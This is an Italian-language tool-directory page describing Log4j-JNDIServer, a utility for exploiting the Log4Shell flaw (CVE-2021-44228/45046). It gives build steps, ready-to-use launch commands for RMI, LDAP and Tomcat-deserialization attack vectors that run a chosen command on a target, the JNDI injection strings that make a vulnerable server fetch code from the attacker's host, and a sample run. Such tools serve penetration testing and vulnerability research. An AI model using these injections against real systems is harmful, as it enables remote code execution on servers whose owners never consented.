Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4j-JNDIServer — Questo progetto aiuterà a testare la vulnerabilità Log4j CVE-2021-44228. | Kitploit
Strumenti/GitHubGitHub/immunityinc/log4j-jndiserver
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso Remoto
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

Questo progetto aiuterà a testare la vulnerabilità Log4j CVE-2021-44228.

Vedi Repository
924 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4j-JNDIServer

Questo progetto aiuta a testare le vulnerabilità Log4j CVE-2021-44228/CVE-2021-45046.

Installazione e compilazione

  • Caricare il progetto su Intellij Idea
  • Selezionare JDK in "Project Settings" (CTRL + ALT + SHIFT + S)
  • In "Project Settings", creare l'Artifact -> "Artifacts" -> "Create JAR from Modules" -> In "JAR files from libraries", spuntare "extract to target JAR" -> "OK"
  • Compilare il progetto (CTRL + F9). Questo creerà il file jar nella cartella /out/artifacts/

Compilazione con Maven

Richiede Java 1.8+ e Maven 3.x+

  • mvn clean package -DskipTests
  • Troverai il file .jar nella cartella /target

Usi

1. Vettore di attacco RMI

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Non è più necessario ospitare Exploit.class. L'app avvierà un server HTTP sulla porta indicata.

Devi indicare il comando che vuoi eseguire sul target.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2. Vettore di attacco LDAP

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Non è più necessario ospitare Exploit.class. L'app avvierà un server HTTP sulla porta indicata.

Devi indicare il comando che vuoi eseguire sul target.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3. Vettore di attacco per deserializzazione (usando il payload Tomcat)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Esempio

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
Scarica lo strumento